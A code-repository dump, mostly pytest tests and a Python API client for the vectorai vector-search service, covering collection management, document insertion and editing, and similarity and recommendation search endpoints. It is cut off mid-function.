f_new = pickle.loads(f_string)
self.assertEqual(str(r),str(f_new))
class TestMinimize(unittest.TestCase):
def test_min(self):
s="""
async function jo(...a) {
var f=(...a) => {let b=12}
}
"""
x=vbuild.minimize(s)
self.assertTrue( "$jscomp" in x)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "0xflotus/vectorai",
"score": 2
} |
#### File: tests/embed/test_save_funcs.py
```python
import os
import pytest
from vectorai.models import *
from appdirs import *
def test_start_utils_mixin():
utils_func = EmbedMixin()
assert True
def check():
"""Dummy function"""
return 1
def test_save_function():
"""Test adding an embedding function"""
mixin = EmbedMixin("test", "test")
index_name = "test"
vector_name = "test"
mixin.save_function(index_name, vector_name, check)
assert True
def test_load_function():
"""Test loading of the function"""
mixin = EmbedMixin("test", "test")
assert mixin.load_function("test", "test") == check
def test_load_function_keyerror():
"""Test loading of the function"""
with pytest.raises(KeyError):
mixin = EmbedMixin("test", "test")
assert mixin.load_function("test", "check") != check
@pytest.mark.xfail
def test_save_string_input():
"""Testing for string input. This should fail.
"""
string_input = "def function"
with pytest.raises(AssertionError):
mixin = EmbedMixin("test", "test")
mixin.save_function("test", "new", string_input)
```
#### File: vectorai/tests/test_write.py
```python
import json
import pytest
import os
import time
import numpy as np
try:
import tensorflow as tf
from vectorai.models.transformer_models import Transformer2Vec
except:
pass
from vectorai.write import ViWriteClient
from vectorai.errors import APIError
from vectorai.client import ViClient
class TestCollectionBasics:
@pytest.mark.use_client
def test_create_collection(self, test_client, test_collection_name, test_vector_field):
collection_name = test_collection_name
if collection_name in test_client.list_collections():
test_client.delete_collection(collection_name)
response = test_client.create_collection(
collection_name=collection_name, collection_schema={test_vector_field: 512}
)
assert response is None
@pytest.mark.use_client
def test_prevent_collection_overwrite(self, test_client, test_collection_name):
"""
Test prevention of the overwriting of the collections.
"""
if test_collection_name not in test_client.list_collections():
test_client.create_collection(test_collection_name)
with pytest.raises(APIError):
response = test_client.create_collection(collection_name=test_collection_name)
@pytest.mark.use_client
def test_list_collections(self, test_collection_name, test_client):
response = test_client.list_collections()
assert response.count(test_collection_name) == 1
@pytest.mark.use_client
def test_delete_collection(self, test_client, test_collection_name):
response = test_client.delete_collection(collection_name=test_collection_name)
assert response['status'] == 'complete'
def test__as_json(test_client):
sample_document = {
"val": np.rand(20),
"val_2": np.rand(100)
}
sample_document_result = test_client._as_json(sample_document)
assert sample_document_result == sample_document
def assert_json_serializable(document, temp_json_file="test.json"):
"""Assert that an document is json serializable and is the same after loading back into Python.
"""
with open(temp_json_file, "w") as f:
json.dump(document, f)
return_document = json.load(open(temp_json_file, "r"))
os.remove(temp_json_file)
assert return_document == document
def test__as_json(test_client):
"""Test automatic JSON conversion for numpy arrays.
"""
sample_document = {"val": np.random.rand(20), "val_2": np.random.rand(100)}
sample_document_result = test_client._as_json(sample_document)
assert_json_serializable(sample_document_result)
@pytest.mark.use_tensorflow
def test__as_json_tensorflow(test_client):
"""Test automatic JSON conversion for tensorflow tensors.
"""
sample_document = {
"val": tf.random.uniform((1, 20)),
"val_2": tf.random.uniform((1, 20)),
}
sample_document_result = test_client._as_json(sample_document, flatten=True)
assert_json_serializable(sample_document_result)
@pytest.mark.use_tensorflow
def test__as_json_tensorflow_error_raise(test_client):
"""Test that error is raised with tensorflow conversion when rank (ndims) is greater than 2.
"""
sample_document = {"val": tf.random.uniform((1, 1, 20))}
with pytest.raises(APIError):
sample_document_result = test_client._as_json(sample_document)
class TestInsert:
@pytest.mark.use_client
def test_insert_single_document(self, test_client, test_collection_name):
if test_collection_name not in test_client.list_collections():
test_client.create_collection(test_collection_name)
document = {"sample_vector_": test_client.generate_vector(20), "sample_name": "hi"}
response = test_client.insert_document(
collection_name=test_collection_name, document=document
)
assert response is None
@pytest.mark.use_client
def test_insert_single_document_error(self, test_client, test_collection_name):
"""Trigger an insert fail error
"""
with pytest.raises(APIError):
if test_collection_name not in test_client.list_collections():
test_client.create_collection(test_collection_name)
document = {
"sample_vectors_": [test_client.generate_vector(20)] + [np.nan],
"samplename": [["hi"]],
}
response = test_client.insert_document(
collection_name=test_collection_name, document=document
)
@pytest.mark.use_client
def test_clean_up(self, test_client, test_collection_name):
"""Remove a collection if it is there.
"""
if test_collection_name in test_client.list_collections():
test_client.delete_collection(test_collection_name)
assert test_collection_name not in test_client.list_collections()
class TestEdit:
@pytest.mark.use_client
def test_setup_for_read(self, test_client, test_collection_name):
"""Test Setup for Read Operations"""
if test_collection_name in test_client.list_collections():
test_client.delete_collection(collection_name=test_collection_name)
documents = [
{
"_id": "2",
"document_vector_": test_client.generate_vector(vector_length=512),
"attribute": "red",
},
{
"_id": "1",
"document_vector_": test_client.generate_vector(vector_length=512),
"attribute": "blue",
},
]
test_client.insert_documents(
collection_name=test_collection_name, documents=documents
)
assert True
@pytest.mark.use_client
def test_edit_document(self, test_client, test_collection_name):
test_client.insert_documents(test_collection_name,
test_client.create_sample_documents(10))
edits = {
"_id": "1",
"location": "Paris"
}
test_client.edit_document(
collection_name=test_collection_name, edits=edits
)
time.sleep(5)
doc = test_client.id(test_collection_name, document_id="1")
assert doc["location"] == "Paris"
@pytest.mark.use_client
def test_edit_documents(self, test_client, test_collection_name):
"""Test adding of an attribute
"""
edits = [
{"_id": "2", "location": "Sydney",},
{"_id": "1", "location": "New York",},
]
test_client.edit_documents(test_collection_name, edits, workers=2)
doc = test_client.id(test_collection_name, document_id="2")
assert doc["location"] == "Sydney"
doc = test_client.id(test_collection_name, document_id="1")
assert doc['location'] == 'New York'
@pytest.mark.use_client
def test_cleanup(self, test_client, test_collection_name):
if test_collection_name in test_client.list_collections():
test_client.delete_collection(test_collection_name)
# @pytest.mark.skip("Embed function is on pause until there is more clarity.")
# def test_multiple_insert_documents_embed(
# test_client,
# test_api_key,
# test_username,
# test_collection_name,
# test_vector_field,
# test_id_field,
# ):
# documents = [
# {"_id": "5", "attribute": "violet"},
# {"_id": "6", "attribute": "black"},
# ]
# class Model:
# def encode(self, document):
# return test_client.generate_vector(512)
# model = Model()
# test_client.insert_documents(
# test_collection_name, documents=documents, models={test_vector_field: model}
# )
# return_document = test_client.id(
# collection_name=test_collection_name, document_id="5"
# )
# assert return_document["attribute"] == "violet"
# return_document = test_client.id(
# collection_name=test_collection_name, document_id="6"
# )
# assert return_document["attribute"] == "black"
# @pytest.mark.skip(
# "Function embedding needs to be more " + "thoroughly discussed and may change."
# )
# def test_insert_document_embed(
# test_client, test_api_key, test_username, test_collection_name
# ):
# # The embed function string most be reproducible
# # test_client = ViClient(username="test")
# embed_func_str = f"""from vectorai import ViClient
# test_client = ViClient("{test_username}", "{test_api_key}")
# def embed_function(document):
# return test_client.generate_vector(512)
# """
# document = {"_id": 2, "attribute": "orange"}
# test_client.insert_document(
# collection_name=test_collection_name,
# document=document,
# use_embed_func=True,
# embed_func_list=[embed_func_str],
# search_vector_fields=["document_vector_"],
# )
def test__write_document_nested_field():
sample = {"this": {}}
ViWriteClient.set_field("this.is", doc=sample, value=[0, 2])
assert sample["this"]["is"] == [0, 2]
def test__write_document_nested_field_2():
sample = {"this": {"is": {}}}
ViWriteClient.set_field("this.is", doc=sample, value=[0, 2])
assert sample["this"]["is"] == [0, 2]
@pytest.mark.use_tensorflow
def test__encode_documents_with_models(test_client, sample_documents):
"""Test Model Encoding
"""
model = Transformer2Vec('distilbert')
roberta_model = Transformer2Vec('distilroberta')
test_client._encode_documents_with_models(sample_documents, models={'team': [model, roberta_model]})
assert 'distilbert' in test_client.get_name(model)
assert 'roberta' in test_client.get_name(roberta_model)
assert 'team_distilroberta_text_vector_' in sample_documents[0].keys()
assert 'team_distilbert_text_vector_' in sample_documents[0].keys()
@pytest.mark.use_client
def test_encode_documents_with_deployed_model(test_client, test_text_encoder):
"""
Test single encoding method for models.
"""
documents = test_client.create_sample_documents(10)
test_client._encode_documents_with_models(documents, models={'color': [test_text_encoder]}, use_bulk_encode=False)
assert 'color_vector_' in documents[0].keys()
assert len(documents[0]['color_vector_']) > 0
@pytest.mark.use_client
def test_bulk_encode_documents_with_deployed_model(test_client, test_text_encoder):
"""
Test bulk encoding method for models.
"""
documents = test_client.create_sample_documents(10)
test_client._encode_documents_with_models_in_bulk(documents, models={'color': [test_text_encoder]})
assert 'color_vector_' in documents[0].keys()
assert len(documents[0]['color_vector_']) > 0
@pytest.mark.use_client
def test_multiprocess_insert(test_client, test_collection_name):
NUM_OF_DOCUMENTS_INSERTED = 10
if test_collection_name in test_client.list_collections():
test_client.delete_collection(test_collection_name)
documents = test_client.create_sample_documents(NUM_OF_DOCUMENTS_INSERTED)
results = test_client.insert_documents(test_collection_name, documents, workers=5)
assert len(results['failed_document_ids']) == 0
assert test_collection_name in test_client.list_collections()
assert test_client.collection_stats(test_collection_name)['number_of_documents'] == NUM_OF_DOCUMENTS_INSERTED
test_client.delete_collection(test_collection_name)
@pytest.mark.use_client
def test_multiprocess_insert_with_error(test_client, test_collection_name):
NUM_OF_DOCUMENTS_INSERTED = 10
if test_collection_name in test_client.list_collections():
test_client.delete_collection(test_collection_name)
documents = test_client.create_sample_documents(NUM_OF_DOCUMENTS_INSERTED)
documents.append({
'_id': 3,
'color': np.nan
})
# This should result in 1 failure
results = test_client.insert_documents(test_collection_name, documents, workers=5)
assert len(results['failed_document_ids']) == 1
assert test_collection_name in test_client.list_collections()
assert test_client.collection_stats(test_collection_name)['number_of_documents'] == NUM_OF_DOCUMENTS_INSERTED
test_client.delete_collection(test_collection_name)
@pytest.mark.use_client
def test_multiprocess_with_collection_client(test_collection_client, test_collection_name):
NUM_OF_DOCUMENTS_INSERTED = 10
if test_collection_client.collection_name in test_collection_client.list_collections():
test_collection_client.delete_collection()
documents = test_collection_client.create_sample_documents(NUM_OF_DOCUMENTS_INSERTED)
results = test_collection_client.insert_documents(documents, workers=5)
assert len(results['failed_document_ids']) == 0
assert test_collection_client.collection_name in test_collection_client.list_collections()
assert test_collection_client.collection_stats()['number_of_documents'] == NUM_OF_DOCUMENTS_INSERTED
test_collection_client.delete_collection()
@pytest.mark.use_client
def test_multiprocess__with_error_with_collection_client(test_collection_client):
NUM_OF_DOCUMENTS_INSERTED = 10
if test_collection_client.collection_name in test_collection_client.list_collections():
test_collection_client.delete_collection()
documents = test_collection_client.create_sample_documents(NUM_OF_DOCUMENTS_INSERTED)
documents.append({
'_id': 3,
'color': np.nan
})
# This should result in 1 failure
results = test_collection_client.insert_documents(documents, workers=5)
assert len(results['failed_document_ids']) == 1
assert test_collection_client.collection_name in test_collection_client.list_collections()
assert test_collection_client.collection_stats()['number_of_documents'] == NUM_OF_DOCUMENTS_INSERTED
test_collection_client.delete_collection()
```
#### File: vectorai/api/search.py
```python
import io
import base64
import requests
from typing import Dict, List
class ViSearchClient:
"""
Search and Advanced Search Operations
"""
def __init__(self, username, api_key, url=None):
self.username = username
self.api_key = api_key
if url:
self.url = url
else:
self.url = "https://api.vctr.ai"
def _search(
self,
collection_name: str,
vector: List,
fields: List,
sum_fields: bool = True,
metric: str = "cosine",
min_score=None,
page: int = 1,
page_size: int = 10,
include_vector=False,
include_count=True,
):
"""
Vector Similarity Search. Search a vector field with a vector, a.k.a Nearest Neighbors Search
Enables machine learning search with vector search. Search with a vector for the most similar vectors.
For example: Search with a person's characteristics, who are the most similar (querying the "persons_characteristics_vector" field)::
Query person's characteristics as a vector:
[180, 40, 70] representing [height, age, weight]
Search Results:
[
{"name": <NAME>, "persons_characteristics_vector" : [180, 56, 71]},
{"name": <NAME>, "persons_characteristics_vector" : [180, 56, 65]},
...]
Args:
vector:
Vector, a list/array of floats that represents a piece of data.
collection_name:
Name of Collection
search_fields:
Vector fields to search through
approx:
Used for approximate search
sum_fields:
Whether to sum the multiple vectors similarity search score as 1 or seperate
page_size:
Size of each page of results
page:
Page of the results
metric:
Similarity Metric, choose from ['cosine', 'l1', 'l2', 'dp']
min_score:
Minimum score for similarity metric
include_vector:
Include vectors in the search results
include_count:
Include count in the search results
"""
return requests.get(
url="{}/collection/search".format(self.url),
params={
"username": self.username,
"api_key": self.api_key,
"collection_name": collection_name,
"vector": vector,
"sum_fields": sum_fields,
"search_fields": fields,
"metric": metric,
"min_score": min_score,
"page": page,
"page_size": page_size,
"include_vector": include_vector,
"include_count": include_count,
},
).json()
def hybrid_search(
self,
collection_name: str,
text: str,
vector: List,
fields: List,
text_fields: List,
sum_fields: bool = True,
metric: str = "cosine",
min_score=None,
traditional_weight=0.075,
page: int = 1,
page_size: int = 10,
include_vector=False,
include_count=True,
):
"""
Search a text field with vector and text using Vector Search and Traditional Search
Vector similarity search + Traditional Fuzzy Search with text and vector.
Args:
text:
Text Search Query (not encoded as vector)
vector:
Vector, a list/array of floats that represents a piece of data.
text_fields:
Text fields to search against
traditional_weight:
Multiplier of traditional search. A value of 0.025~0.1 is good.
fuzzy:
Fuzziness of the search. A value of 1-3 is good.
join:
Whether to consider cases where there is a space in the word. E.g. Go Pro vs GoPro.
collection_name:
Name of Collection
search_fields:
Vector fields to search through
approx:
Used for approximate search
sum_fields:
Whether to sum the multiple vectors similarity search score as 1 or seperate
page_size:
Size of each page of results
page:
Page of the results
metric:
Similarity Metric, choose from ['cosine', 'l1', 'l2', 'dp']
min_score:
Minimum score for similarity metric
include_vector:
Include vectors in the search results
include_count:
Include count in the search results
hundred_scale:
Whether to scale up the metric by 100
"""
return requests.get(
url="{}/collection/hybrid_search".format(self.url),
params={
"username": self.username,
"api_key": self.api_key,
"collection_name": collection_name,
"text": text,
"vector": vector,
"search_fields": fields,
"text_fields": text_fields,
"sum_fields": sum_fields,
"metric": metric,
"min_score": min_score,
"traditional_weight": traditional_weight,
"page": page,
"page_size": page_size,
"include_vector": include_vector,
"include_count": include_count,
},
).json()
def search_by_id(
self,
collection_name: str,
document_id: str,
field: str,
sum_fields: bool = True,
metric: str = "cosine",
min_score=0,
page: int = 1,
page_size: int = 10,
include_vector=False,
include_count=True,
):
"""
Single Product Recommendations (Search by an id)
Recommendation by retrieving the vector from the specified id's document. Then performing a search with that vector.
Args:
document_id:
ID of a document
collection_name:
Name of Collection
search_field:
Vector fields to search through
approx:
Used for approximate search
sum_fields:
Whether to sum the multiple vectors similarity search score as 1 or seperate
page_size:
Size of each page of results
page:
Page of the results
metric:
Similarity Metric, choose from ['cosine', 'l1', 'l2', 'dp']
min_score:
Minimum score for similarity metric
include_vector:
Include vectors in the search results
include_count:
Include count in the search results
hundred_scale:
Whether to scale up the metric by 100
"""
return requests.get(
url="{}/collection/search_by_id".format(self.url),
params={
"username": self.username,
"api_key": self.api_key,
"collection_name": collection_name,
"document_id": document_id,
"search_field": field,
"sum_fields": sum_fields,
"metric": metric,
"min_score": min_score,
"page": page,
"page_size": page_size,
"include_vector": include_vector,
"include_count": include_count,
},
).json()
def search_by_ids(
self,
collection_name: str,
document_ids: List,
field: str,
vector_operation: str = "mean",
sum_fields: bool = True,
metric: str = "cosine",
min_score=0,
page: int = 1,
page_size: int = 10,
include_vector=False,
include_count=True,
):
"""
Multi Product Recommendations (Search by ids)
Recommendation by retrieving the vectors from the specified list of ids documents. Then performing a search with an aggregated vector that is the sum (depends on vector_operation) of those vectors.
Args:
document_ids:
IDs of documents
vector_operation:
Aggregation for the vectors, choose from ['mean', 'sum', 'min', 'max']
collection_name:
Name of Collection
search_field:
Vector fields to search through
approx:
Used for approximate search
sum_fields:
Whether to sum the multiple vectors similarity search score as 1 or seperate
page_size:
Size of each page of results
page:
Page of the results
metric:
Similarity Metric, choose from ['cosine', 'l1', 'l2', 'dp']
min_score:
Minimum score for similarity metric
include_vector:
Include vectors in the search results
include_count:
Include count in the search results
hundred_scale:
Whether to scale up the metric by 100
"""
return requests.get(
url="{}/collection/search_by_ids".format(self.url),
params={
"username": self.username,
"api_key": self.api_key,
"collection_name": collection_name,
"document_ids": document_ids,
"search_field": field,
"vector_operation": vector_operation,
"sum_fields": sum_fields,
"metric": metric,
"min_score": min_score,
"page": page,
"page_size": page_size,
"include_vector": include_vector,
"include_count": include_count,
},
).json()
def search_by_positive_negative_ids(
self,
collection_name: str,
positive_document_ids: List,
negative_document_ids: List,
field: str,
vector_operation: str = "mean",
sum_fields: bool = True,
metric: str = "cosine",
min_score=0,
page: int = 1,
page_size: int = 10,
include_vector=False,
include_count=True,
):
"""
Multi Product Recommendations with Likes and Dislikes (Search by ids)
Recommendation by retrieving the vectors from the specified list of positive and negative ids documents. Then performing a search with an aggregated vector that is the sum (depends on vector_operation) of positive id vectors minus the negative id vectors.
Args:
positive_document_ids:
Positive Document IDs to get recommendations for, and the weightings of each document
negative_document_ids:
Negative Document IDs to get recommendations for, and the weightings of each document
vector_operation:
Aggregation for the vectors, choose from ['mean', 'sum', 'min', 'max']
collection_name:
Name of Collection
search_field:
Vector fields to search through
approx:
Used for approximate search
sum_fields:
Whether to sum the multiple vectors similarity search score as 1 or seperate
page_size:
Size of each page of results
page:
Page of the results
metric:
Similarity Metric, choose from ['cosine', 'l1', 'l2', 'dp']
min_score:
Minimum score for similarity metric
include_vector:
Include vectors in the search results
include_count:
Include count in the search results
hundred_scale:
Whether to scale up the metric by 100
"""
return requests.get(
url="{}/collection/search_by_positive_negative_ids".format(self.url),
params={
"username": self.username,
"api_key": self.api_key,
"collection_name": collection_name,
"positive_document_ids": positive_document_ids,
"negative_document_ids": negative_document_ids,
"search_field": field,
"vector_operation": vector_operation,
"sum_fields": sum_fields,
"metric": metric,
"min_score": min_score,
"page": page,
"page_size": page_size,
"include_vector": include_vector,
"include_count": include_count,
},
).json()
def search_with_positive_negative_ids_as_history(
self,
collection_name: str,
vector: List,
positive_document_ids: List,
negative_document_ids: List,
field: str,
vector_operation: str = "mean",
sum_fields: bool = True,
metric: str = "cosine",
min_score=0,
page: int = 1,
page_size: int = 10,
include_vector=False,
include_count=True,
):
"""
Multi Product Recommendations with Likes and Dislikes (Search by ids)
Search by retrieving the vectors from the specified list of positive and negative ids documents. Then performing a search with search query vector and aggregated vector, that is the sum (depends on vector_operation) of positive id vectors minus the negative id vectors.
Args:
vector:
Vector, a list/array of floats that represents a piece of data.
positive_document_ids:
Positive Document IDs to get recommendations for, and the weightings of each document
negative_document_ids:
Negative Document IDs to get recommendations for, and the weightings of each document
vector_operation:
Aggregation for the vectors, choose from ['mean', 'sum', 'min', 'max']
collection_name:
Name of Collection
search_field:
Vector fields to search through
approx:
Used for approximate search
sum_fields:
Whether to sum the multiple vectors similarity search score as 1 or seperate
page_size:
Size of each page of results
page:
Page of the results
metric:
Similarity Metric, choose from ['cosine', 'l1', 'l2', 'dp']
min_score:
Minimum score for similarity metric
include_vector:
Include vectors in the search results
include_count:
Include count in the search results
hundred_scale:
Whether to scale up the metric by 100
"""
return requests.get(
url="{}/collection/search_with_positive_negative_ids_as_history".format(self.url),
params={
"username": self.username,
"api_key": self.api_key,
"collection_name": collection_name,
"vector": vector,
"positive_document_ids": positive_document_ids,
"negative_document_ids": negative_document_ids,
"search_field": field,
"vector_operation": vector_operation,
"sum_fields": sum_fields,
"metric": metric,
"min_score": min_score,
"page": page,
"page_size": page_size,
"include_vector": include_vector,
"include_count": include_count,
},
).json()
def advanced_search(
self,
collection_name: str,
multivector_query: Dict,
sum_fields: bool = True,
facets: List = [],
filters: List = [],
metric: str = "cosine",
min_score=None,
page: int = 1,
page_size: int = 10,
include_vector=False,
include_count=True,
include_facets=False,
):
"""
Advanced Vector Similarity Search. Support for multiple vectors, vector weightings, facets and filtering
Advance Vector Similarity Search, enables machine learning search with vector search. Search with a multiple vectors for the most similar documents.
For example: Search with a product image and description vectors to find the most similar products by what it looks like and what its described to do.
You can also give weightings of each vector field towards the search, e.g. image\_vector\_ weights 100%, whilst description\_vector\_ 50%.
Advanced search also supports filtering to only search through filtered results and facets to get the overview of products available when a minimum score is set.
Args:
collection_name:
Name of Collection
page:
Page of the results
page_size:
Size of each page of results
approx:
Used for approximate search
sum_fields:
Whether to sum the multiple vectors similarity search score as 1 or seperate
metric:
Similarity Metric, choose from ['cosine', 'l1', 'l2', 'dp']
filters:
Query for filtering the search results
facets:
Fields to include in the facets, if [] then all
min_score:
Minimum score for similarity metric
include_vector:
Include vectors in the search results
include_count:
Include count in the search results
include_facets:
Include facets in the search results
hundred_scale:
Whether to scale up the metric by 100
multivector_query:
Query for advance search that allows for multiple vector and field querying
Example:
>>> vi_client = ViCollectionClient(username, api_key, collection_name, url)
>>> advanced_search_query = {
'text' : {'vector': encode_question("How do I cluster?"), 'fields' : ['function_vector_']}
}
>>> vi_client.advanced_search(advanced_search_query)
"""
return requests.post(
url="{}/collection/advanced_search".format(self.url),
json={
"username": self.username,
"api_key": self.api_key,
"collection_name": collection_name,
"multivector_query": multivector_query,
"facets": facets,
"filters": filters,
"sum_fields": sum_fields,
"metric": metric,
"min_score": min_score,
"page": page,
"page_size": page_size,
"include_vector": include_vector,
"include_count": include_count,
"include_facets": include_facets,
},
).json()
def advanced_hybrid_search(
self,
collection_name: str,
text: str,
multivector_query: Dict,
text_fields: List,
sum_fields: bool = True,
facets: List = [],
filters: List = [],
metric: str = "cosine",
min_score=None,
page: int = 1,
page_size: int = 10,
include_vector=False,
include_count=True,
include_facets=False,
):
"""
Advanced Search a text field with vector and text using Vector Search and Traditional Search
Advanced Vector similarity search + Traditional Fuzzy Search with text and vector.
You can also give weightings of each vector field towards the search, e.g. image\_vector\_ weights 100%, whilst description\_vector\_ 50%.
Advanced search also supports filtering to only search through filtered results and facets to get the overview of products available when a minimum score is set.
Args:
collection_name:
Name of Collection
page:
Page of the results
page_size:
Size of each page of results
approx:
Used for approximate search
sum_fields:
Whether to sum the multiple vectors similarity search score as 1 or seperate
metric:
Similarity Metric, choose from ['cosine', 'l1', 'l2', 'dp']
filters:
Query for filtering the search results
facets:
Fields to include in the facets, if [] then all
min_score:
Minimum score for similarity metric
include_vector:
Include vectors in the search results
include_count:
Include count in the search results
include_facets:
Include facets in the search results
hundred_scale:
Whether to scale up the metric by 100
multivector_query:
Query for advance search that allows for multiple vector and field querying
text:
Text Search Query (not encoded as vector)
text_fields:
Text fields to search against
traditional_weight:
Multiplier of traditional search. A value of 0.025~0.1 is good.
fuzzy:
Fuzziness of the search. A value of 1-3 is good.
join:
Whether to consider cases where there is a space in the word. E.g. Go Pro vs GoPro.
"""
return requests.post(
url="{}/collection/advanced_hybrid_search".format(self.url),
json={
"username": self.username,
"api_key": self.api_key,
"collection_name": collection_name,
"text": text,
"multivector_query": multivector_query,
"text_fields": text_fields,
"sum_fields": sum_fields,
"facets": facets,
"filters": filters,
"metric": metric,
"min_score": min_score,
"page": page,
"page_size": page_size,
"include_vector": include_vector,
"include_count": include_count,
"include_facets": include_facets,
},
).json()
def advanced_search_by_id(
self,
collection_name: str,
document_id: str,
fields: Dict,
sum_fields: bool = True,
facets: List = [],
filters: List = [],
metric: str = "cosine",
min_score=None,
page: int = 1,
page_size: int = 10,
include_vector=False,
include_count=True,
include_facets=False,
):
"""
Advanced Single Product Recommendations (Search by an id).
For example: Search with id of a product in the database, and using the product's image and description vectors to find the most similar products by what it looks like and what its described to do.
You can also give weightings of each vector field towards the search, e.g. image\_vector\_ weights 100%, whilst description\_vector\_ 50%.
Advanced search also supports filtering to only search through filtered results and facets to get the overview of products available when a minimum score is set.
Args:
collection_name:
Name of Collection
page:
Page of the results
page_size:
Size of each page of results
approx:
Used for approximate search
sum_fields:
Whether to sum the multiple vectors similarity search score as 1 or seperate
metric:
Similarity Metric, choose from ['cosine', 'l1', 'l2', 'dp']
filters:
Query for filtering the search results
facets:
Fields to include in the facets, if [] then all
min_score:
Minimum score for similarity metric
include_vector:
Include vectors in the search results
include_count:
Include count in the search results
include_facets:
Include facets in the search results
hundred_scale:
Whether to scale up the metric by 100
document_id:
ID of a document
search_fields:
Vector fields to search against, and the weightings for them.
"""
return requests.post(
url="{}/collection/advanced_search_by_id".format(self.url),
json={
"username": self.username,
"api_key": self.api_key,
"collection_name": collection_name,
"document_id": document_id,
"search_fields": fields,
"sum_fields": sum_fields,
"facets": facets,
"filters": filters,
"metric": metric,
"min_score": min_score,
"page": page,
"page_size": page_size,
"include_vector": include_vector,
"include_count": include_count,
"include_facets": include_facets,
},
).json()
def advanced_search_by_ids(
self,
collection_name: str,
document_ids: Dict,
fields: Dict,
vector_operation: str = "mean",
sum_fields: bool = True,
facets: List = [],
filters: List = [],
metric: str = "cosine",
min_score=None,
page: int = 1,
page_size: int = 10,
include_vector=False,
include_count=True,
include_facets=False,
):
"""
Advanced Multi Product Recommendations (Search by ids).
For example: Search with multiple ids of products in the database, and using the product's image and description vectors to find the most similar products by what it looks like and what its described to do.
You can also give weightings of each vector field towards the search, e.g. image\_vector\_ weights 100%, whilst description\_vector\_ 50%.
You can also give weightings of on each product as well e.g. product ID-A weights 100% whilst product ID-B 50%.
Advanced search also supports filtering to only search through filtered results and facets to get the overview of products available when a minimum score is set.
Args:
collection_name:
Name of Collection
page:
Page of the results
page_size:
Size of each page of results
approx:
Used for approximate search
sum_fields:
Whether to sum the multiple vectors similarity search score as 1 or seperate
metric:
Similarity Metric, choose from ['cosine', 'l1', 'l2', 'dp']
filters:
Query for filtering the search results
facets:
Fields to include in the facets, if [] then all
min_score:
Minimum score for similarity metric
include_vector:
Include vectors in the search results
include_count:
Include count in the search results
include_facets:
Include facets in the search results
hundred_scale:
Whether to scale up the metric by 100
document_ids:
Document IDs to get recommendations for, and the weightings of each document
search_fields:
Vector fields to search against, and the weightings for them.
vector_operation:
Aggregation for the vectors, choose from ['mean', 'sum', 'min', 'max']
"""
return requests.post(
url="{}/collection/advanced_search_by_ids".format(self.url),
json={
"username": self.username,
"api_key": self.api_key,
"collection_name": collection_name,
"document_ids": document_ids,
"search_fields": fields,
"vector_operation": vector_operation,
"sum_fields": sum_fields,
"facets": facets,
"filters": filters,
"metric": metric,
"min_score": min_score,
"page": page,
"page_size": page_size,
"include_vector": include_vector,
"include_count": include_count,
"include_facets": include_facets,
},
).json()
def advanced_search_by_positive_negative_ids(
self,
collection_name: str,
positive_document_ids: Dict,
negative_document_ids: Dict,
fields: Dict,
vector_operation: str = "mean",
sum_fields: bool = True,
facets: List = [],
filters: List = [],
metric: str = "cosine",
min_score=None,
page: int = 1,
page_size: int = 10,
include_vector=False,
include_count=True,
include_facets=False,
):
"""
Advanced Multi Product Recommendations with likes and dislikes (Search by ids).
For example: Search with multiple ids of liked and dislike products in the database. Then using the product's image and description vectors to find the most similar products by what it looks like and what its described to do against the positives and most disimilar products for the negatives.
You can also give weightings of each vector field towards the search, e.g. image\_vector\_ weights 100%, whilst description\_vector\_ 50%.
You can also give weightings of on each product as well e.g. product ID-A weights 100% whilst product ID-B 50%.
Advanced search also supports filtering to only search through filtered results and facets to get the overview of products available when a minimum score is set.
Args:
collection_name:
Name of Collection
page:
Page of the results
page_size:
Size of each page of results
approx:
Used for approximate search
sum_fields:
Whether to sum the multiple vectors similarity search score as 1 or seperate
metric:
Similarity Metric, choose from ['cosine', 'l1', 'l2', 'dp']
filters:
Query for filtering the search results
facets:
Fields to include in the facets, if [] then all
min_score:
Minimum score for similarity metric
include_vector:
Include vectors in the search results
include_count:
Include count in the search results
include_facets:
Include facets in the search results
hundred_scale:
Whether to scale up the metric by 100
positive_document_ids:
Positive Document IDs to get recommendations for, and the weightings of each document
negative_document_ids:
Negative Document IDs to get recommendations for, and the weightings of each document
search_fields:
Vector fields to search against, and the weightings for them.
vector_operation:
Aggregation for the vectors, choose from ['mean', 'sum', 'min', 'max']
"""
return requests.post(
url="{}/collection/advanced_search_by_positive_negative_ids".format(
self.url
),
json={
"username": self.username,
"api_key": self.api_key,
"collection_name": collection_name,
"positive_document_ids": positive_document_ids,
"negative_document_ids": negative_document_ids,
"search_fields": fields,
"vector_operation": vector_operation,
"sum_fields": sum_fields,
"facets": facets,
"filters": filters,
"metric": metric,
"min_score": min_score,
"page": page,
"page_size": page_size,
"include_vector": include_vector,
"include_count": include_count,
"include_facets": include_facets,
},
).json()
def advanced_search_with_positive_negative_ids_as_history(
self,
collection_name: str,
vector:List,
positive_document_ids: Dict,
negative_document_ids: Dict,
fields: Dict,
vector_operation: str = "mean",
sum_fields: bool = True,
facets: List = [],
filters: List = [],
metric: str = "cosine",
min_score=None,
page: int = 1,
page_size: int = 10,
include_vector=False,
include_count=True,
include_facets=False,
):
"""
Advanced Search with Likes and Dislikes as history
For example: Vector search of a query vector with multiple ids of liked and dislike products in the database. Then using the product's image and description vectors to find the most similar products by what it looks like and what its described to do against the positives and most disimilar products for the negatives.
You can also give weightings of each vector field towards the search, e.g. image\_vector\_ weights 100%, whilst description\_vector\_ 50%.
You can also give weightings of on each product as well e.g. product ID-A weights 100% whilst product ID-B 50%.
Advanced search also supports filtering to only search through filtered results and facets to get the overview of products available when a minimum score is set.
Args:
collection_name:
Name of Collection
page:
Page of the results
page_size:
Size of each page of results
approx:
Used for approximate search
sum_fields:
Whether to sum the multiple vectors similarity search score as 1 or seperate
metric:
Similarity Metric, choose from ['cosine', 'l1', 'l2', 'dp']
filters:
Query for filtering the search results
facets:
Fields to include in the facets, if [] then all
min_score:
Minimum score for similarity metric
include_vector:
Include vectors in the search results
include_count:
Include count in the search results
include_facets:
Include facets in the search results
hundred_scale:
Whether to scale up the metric by 100
positive_document_ids:
Positive Document IDs to get recommendations for, and the weightings of each document
negative_document_ids:
Negative Document IDs to get recommendations for, and the weightings of each document
search_fields:
Vector fields to search against, and the weightings for them.
vector_operation:
Aggregation for the vectors, choose from ['mean', 'sum', 'min', 'max']
vector:
Vector, a list/array of floats that represents a piece of data
"""
return requests.post(
url="{}/collection/advanced_search_with_positive_negative_ids_as_history".format(
self.url
),
json={
"username": self.username,
"api_key": self.api_key,
"vector": vector,
"collection_name": collection_name,
"positive_document_ids": positive_document_ids,
